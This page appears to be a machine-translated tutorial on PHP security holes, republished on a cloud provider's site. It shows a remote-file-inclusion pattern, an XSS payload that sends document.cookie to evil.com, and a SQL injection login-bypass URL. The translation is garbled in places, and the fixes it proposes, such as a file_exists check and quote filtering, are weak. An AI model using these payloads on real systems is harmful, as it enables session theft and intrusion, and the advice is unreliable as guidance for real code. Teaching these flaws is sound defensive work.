A summary of some security hidden code in PHP

Source: Internet
Author: User
Tags php code php script sql injection

Baidu a bit. After setting the Open_basedir, only the specified directories and subdirectories under the PHP script will be executed.
Using PHP to read directories or files other than Open_basedir will complain
Insufficient permissions
General virtual host vendors are set to/TMP and/home

This is the user's habit, we have to find a way to solve these problems, the following summed up some of the PHP security issues.

1.include should be careful to determine whether you have this file locally, so as not to create security vulnerabilities.
Like what:

The code is as follows Copy Code
<?php
Include $module. '. PHP ';
?>


This assumes that $module is a function/42833.htm target=_blank > global variable.
This script gives the attacker the opportunity to execute any PHP code on your server, such as adding a module=http://example.com/my after the browser URL. When PHP receives this URL, the value of the "$module" variable in the script is set to http://example.com/my. So it's dangerous when PHP executes the include ...
Workaround: When you close the register_globals or include in php.ini, judge it.

The code is as follows Copy Code
<?php
if (file_exists ($module. ') php ')) {
Include $module. '. PHP ';
}
?>


2. Run the script across the station.
Simply put, attackers can execute client-side scripts, such as JS, in the user's browser, and then steal cookies or other important data from users.
Like <script language= ' JavaScript ' >document.location=? Http://evil.com/cgi-bin/cookie.cgi?f= ' +document.cookie</script>
If you click on the button, your local cookie information will be sent to someone's mailbox (this shows how easy it is for you to make a website that steals user information).
3.SQL Injection
Personally feel that the SQL of their own flexibility, ease of use to bring their own negative impact.

The code is as follows Copy Code
<?php
$query "Select login_id from Users where user= ' $user ' and pwd= ' $PW '";
mysql_query ($query);
?>

Like the person who wrote
Http://example.com/login.php?user=admin '%20or%20 (user= ' &pwd= ')%20r%20user= '
Your PHP code may become.

The code is as follows Copy Code
<?php
$query = "Select login_id from user where user= ' admin ' or (user = ' and pwd= ') or user= '";
mysql_query ($query);
?>


Can filter by function, filter out (') ("), () etc.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.